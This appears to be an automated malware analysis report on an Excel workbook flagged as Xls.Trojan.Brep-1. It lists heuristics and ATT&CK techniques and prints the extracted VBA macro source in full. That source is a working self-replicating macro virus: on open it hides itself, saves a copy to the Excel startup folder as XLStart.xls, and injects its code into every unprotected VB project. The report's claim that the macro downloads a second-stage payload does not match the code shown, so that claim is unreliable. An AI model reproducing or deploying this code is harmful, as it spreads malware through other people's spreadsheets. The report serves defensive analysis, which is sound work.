MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV heuristic and high-severity Workbook_Open macro firing indicate malicious intent. The VBA code attempts to copy itself to a file named 'XLStart.xls' in the Excel startup path, which is a common persistence mechanism. The script's primary function appears to be downloading and executing a second-stage payload, though the full details are truncated.
Heuristics 3
-
ClamAV: Xls.Trojan.Brep-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Brep-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3352 bytes |
SHA-256: d1ce3cb79721e62f776a40541d7a8f2f9d523530fe1100728a0ec56507b4da12 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'TripperB SIFA
Private Sub Workbook_Open()
Dim nbc$
Application.OnSheetActivate = ""
If Dir(Application.StartupPath & "\" & "XLStart.xls") = "XLStart.xls" Then
Call SIFA
Else
Application.ScreenUpdating = False
ThisWorkbook.Modules.Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
nbc$ = ActiveWorkbook.Name
ActiveWorkbook.Sheets(1).Protect DrawingObjects:=True, Contents:=True, Scenarios:=True
ActiveWindow.Visible = False
Call SIFA
Workbooks(nbc$).SaveAs FileName:=Application.StartupPath & "/" & "XLStart.xls", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
Workbooks("XLStart.xls").Saved = True
Application.ScreenUpdating = True
End If
End Sub
Sub SIFA()
Dim vbp
Dim col&
Dim sol$
On Error GoTo Fiu
Application.OnSheetActivate = ""
Application.EnableEvents = False
col& = Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines
sol$ = Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, col&)
For Each vbp In Application.VBE.VBProjects
Select Case vbp.Protection
Case False
col& = vbp.VBComponents("ThisWorkbook").CodeModule.CountOfLines
If vbp.VBComponents("ThisWorkbook").CodeModule.Find(" 'TripperB SIFA", 1, 1, col&, 1) Then
Else
With vbp
.VBComponents("ThisWorkbook").CodeModule.DeleteLines 1, col&
.VBComponents("ThisWorkbook").CodeModule.AddFromString (sol$)
End With
End If
Case Else
End Select
Next
Application.EnableEvents = True
Application.OnWindow = "ThisWorkbook.SIFA"
Fiu:
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.